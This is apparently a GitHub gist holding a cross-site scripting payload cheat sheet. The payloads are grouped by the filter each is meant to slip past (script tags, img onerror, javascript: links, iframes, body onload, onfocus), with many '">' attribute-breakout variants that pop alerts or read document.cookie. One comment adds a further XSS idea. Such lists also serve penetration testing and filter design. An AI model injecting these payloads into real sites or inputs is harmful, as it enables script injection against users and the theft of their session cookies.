Skip to content

Instantly share code, notes, and snippets.

@plvhx

plvhx/foo.txt

Created December 30, 2020 09:19
Show Gist options
  • Save plvhx/6cceb4f97f5d5823a330dcc296ede6b6 to your computer and use it in GitHub Desktop.
Save plvhx/6cceb4f97f5d5823a330dcc296ede6b6 to your computer and use it in GitHub Desktop.
Download ZIP
'xss' and chill..
Raw
foo.txt
[no protection]
--------------------
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>alert(navigator.userAgent)</script>
--------------------
['script' tag prohibition]
--------------------
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(navigator.userAgent)>
<img src=x onerror=javascript:alert(1)>
<img src=x onerror=javascript:alert(document.cookie)>
<img src=x onerror=javascript:alert(navigator.userAgent)>
<a href="javascript:alert(1)">touch me!</a>
<a href="javascript:alert(document.cookie)">touch me!</a>
<a href="javascript:alert(navigator.userAgent)">touch me!</a>
--------------------
['a', 'img', 'script' tag prohibition]
--------------------
"><a href=javascript:alert(1)>hit me!</a>
"><a href=javascript:alert(document.cookie)>hit me!</a>
"><a href=javascript:alert(navigator.userAgent)>hit me!</a>
"><img src=x onerror=alert(1)>
"><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=alert(navigator.userAgent)>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert(document.cookie)>
"><img src=x onerror=javascript:alert(navigator.userAgent)>
"><script>alert(1)</script>
"><script>alert(document.cookie)</script>
"><script>alert(navigator.userAgent)</script>
--------------------
['a', 'img', 'script' tag prohibition with '">' at the beginning]
--------------------
<iframe src=javascript:alert(1)>
<iframe src=javascript:alert(document.cookie)>
<iframe src=javascript:alert(navigator.userAgent)>
"><iframe src=javascript:alert(1)>
"><iframe src=javascript:alert(document.cookie)>
"><iframe src=javascript:alert(navigator.userAgent)>
--------------------
[all tags, events, attributes blocked except 'body' tag and 'onload' event]
--------------------
<body onload=alert(1)>
<body onload=alert(document.cookie)>
<body onload=alert(navigator.userAgent)>
<body onload=javascript:alert(1)>
<body onload=javascript:alert(document.cookie)>
<body onload=javascript:alert(navigator.userAgent)>
"><body onload=alert(1)>
"><body onload=alert(document.cookie)>
"><body onload=alert(navigator.userAgent)>
"><body onload=javascript:alert(1)>
"><body onload=javascript:alert(document.cookie)>
"><body onload=javascript:alert(navigator.userAgent)>
--------------------
[all tags, attributes, and events blocked, except 'onfocus' event]
--------------------
<foo id=x onfocus=alert(1) tabindex=1>
<foo id=x onfocus=alert(document.cookie) tabindex=1>
<foo id=x onfocus=alert(navigator.userAgent) tabindex=1>
<foo id=x onfocus=javascript:alert(1) tabindex=1>
<foo id=x onfocus=javascript:alert(document.cookie) tabindex=1>
<foo id=x onfocus=javascript:alert(navigator.userAgent) tabindex=1>
"><foo id=x onfocus=alert(1) tabindex=1>
"><foo id=x onfocus=alert(document.cookie) tabindex=1>
"><foo id=x onfocus=alert(navigator.userAgent) tabindex=1>
"><foo id=x onfocus=javascript:alert(1) tabindex=1>
"><foo id=x onfocus=javascript:alert(document.cookie) tabindex=1>
"><foo id=x onfocus=javascript:alert(navigator.userAgent) tabindex=1>
--------------------
@blackfly06
Copy link

XSS via target in a tag

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment